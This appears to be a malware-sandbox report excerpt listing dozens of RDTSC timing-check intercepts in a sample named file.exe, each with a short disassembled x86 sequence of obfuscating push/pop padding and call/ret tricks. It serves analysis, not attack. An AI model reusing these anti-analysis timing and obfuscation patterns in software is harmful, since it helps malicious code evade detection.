                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962342 second address: 9623C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F8FB8B0B4A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007F8FB8B0B4B6h 0x0000002d push 00000000h 0x0000002f sub dword ptr [ebp+122D1D87h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F8FB8B0B4A8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push edx 0x00000052 add edi, dword ptr [ebp+122D398Ah] 0x00000058 pop ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9614C3 second address: 9614C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96040F second address: 960413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9614C9 second address: 9614CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96321F second address: 96322B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960413 second address: 960423 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96322B second address: 96322F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9614CD second address: 96153E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D31D8h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F8FB915C648h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 js 00007F8FB915C649h 0x00000038 mov di, si 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov ebx, 6570CED9h 0x00000047 mov eax, dword ptr [ebp+122D1739h] 0x0000004d xor bx, 6799h 0x00000052 push FFFFFFFFh 0x00000054 mov edi, dword ptr [ebp+122D2736h] 0x0000005a mov dword ptr [ebp+122D266Eh], ecx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960423 second address: 960428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96153E second address: 961558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C655h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960428 second address: 96042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 965354 second address: 9653E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F8FB915C648h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1B39h], edi 0x00000028 adc bl, FFFFFFD4h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F8FB915C648h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov ebx, dword ptr [ebp+122D389Ah] 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007F8FB915C648h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 0000001Ch 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 mov di, EE9Fh 0x0000006d xchg eax, esi 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F8FB915C64Bh 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9653E1 second address: 9653FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9604D9 second address: 960504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8FB915C64Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9653FE second address: 96541E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F8FB8B0B4B2h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9675F6 second address: 9675FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9675FB second address: 967666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8FB8B0B4AFh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1C31h], ecx 0x00000014 and bl, 0000001Dh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F8FB8B0B4A8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 movzx edi, di 0x00000036 jo 00007F8FB8B0B4BBh 0x0000003c ja 00007F8FB8B0B4B5h 0x00000042 push 00000000h 0x00000044 xchg eax, esi 0x00000045 jo 00007F8FB8B0B4B0h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e pop eax 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9655A2 second address: 9655BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8FB915C655h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96668A second address: 966701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a xor edi, dword ptr [ebp+122D3856h] 0x00000020 mov eax, dword ptr [ebp+122D0ED1h] 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F8FB8B0B4A8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 jmp 00007F8FB8B0B4B7h 0x00000045 push FFFFFFFFh 0x00000047 mov edi, dword ptr [ebp+122D3436h] 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jo 00007F8FB8B0B4A6h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966701 second address: 966707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 966707 second address: 96670D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96670D second address: 966711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967856 second address: 96785B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96AC7C second address: 96AC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jno 00007F8FB915C646h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jl 00007F8FB915C64Eh 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EA35 second address: 96EA55 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4C2h 0x00000008 jmp 00007F8FB8B0B4B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9724B5 second address: 9724DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8FB915C64Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971C55 second address: 971C68 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FB8B0B4AEh 0x00000008 jg 00007F8FB8B0B4A6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97207C second address: 972080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972080 second address: 972084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97861B second address: 978632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8FB915C64Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978632 second address: 978636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F240 second address: 97F244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F244 second address: 97F251 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DFBE second address: 97DFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E532 second address: 97E54C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F8FB8B0B4A6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F8FB8B0B4A6h 0x00000014 je 00007F8FB8B0B4A6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EAA7 second address: 97EAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8FB915C646h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8FB915C654h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EAC8 second address: 97EADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F8FB8B0B4A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jbe 00007F8FB8B0B4A6h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EADF second address: 97EB0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8FB915C658h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EB0A second address: 97EB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EB0E second address: 97EB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97ECEF second address: 97ECF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F0ED second address: 97F10E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FB915C658h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C087 second address: 90C094 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FB8B0B4A8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98399D second address: 9839A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9839A1 second address: 9839C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B2h 0x00000007 jp 00007F8FB8B0B4A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F8FB8B0B4ACh 0x00000015 jns 00007F8FB8B0B4A6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952B43 second address: 952B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9535F4 second address: 9535F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984270 second address: 984274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984274 second address: 984278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984278 second address: 984281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984281 second address: 984287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BB70 second address: 94BB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C654h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BB88 second address: 94BB8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BDFF second address: 94BE0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BE0E second address: 94BE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BE14 second address: 94BE25 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BE25 second address: 94BE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F8FB8B0B4ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BFB4 second address: 94BFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b jg 00007F8FB915C64Ch 0x00000011 pop esi 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F8FB915C648h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BFD8 second address: 94BFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8FB8B0B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C14C second address: 94C152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C152 second address: 94C158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C158 second address: 94C1A0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F8FB915C64Dh 0x00000012 xchg eax, esi 0x00000013 jc 00007F8FB915C64Ch 0x00000019 mov cx, B1B1h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jmp 00007F8FB915C656h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C1A0 second address: 94C1BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8FB8B0B4B0h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C2A5 second address: 94C2BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C653h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C2BC second address: 94C2C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C491 second address: 94C495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C495 second address: 94C4F0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F8FB8B0B4B1h 0x00000012 pop eax 0x00000013 nop 0x00000014 sub dword ptr [ebp+122D33D0h], edx 0x0000001a push 00000004h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F8FB8B0B4A8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 stc 0x00000037 adc di, DD5Ch 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jc 00007F8FB8B0B4A6h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C4F0 second address: 94C4F6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C4F6 second address: 94C4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C4FC second address: 94C500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C908 second address: 94C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932EBF second address: 932ECF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8FB915C646h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932ECF second address: 932EDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jo 00007F8FB8B0B4A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932EDE second address: 932EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007F8FB915C646h 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932EF2 second address: 932EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932EF8 second address: 932F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8FB915C650h 0x0000000b jmp 00007F8FB915C652h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932F24 second address: 932F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932F2C second address: 932F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98D04F second address: 98D054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98D5E1 second address: 98D5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98D5E6 second address: 98D611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8FB8B0B4B8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98D926 second address: 98D92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DABB second address: 98DAC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993699 second address: 9936A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnc 00007F8FB915C646h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
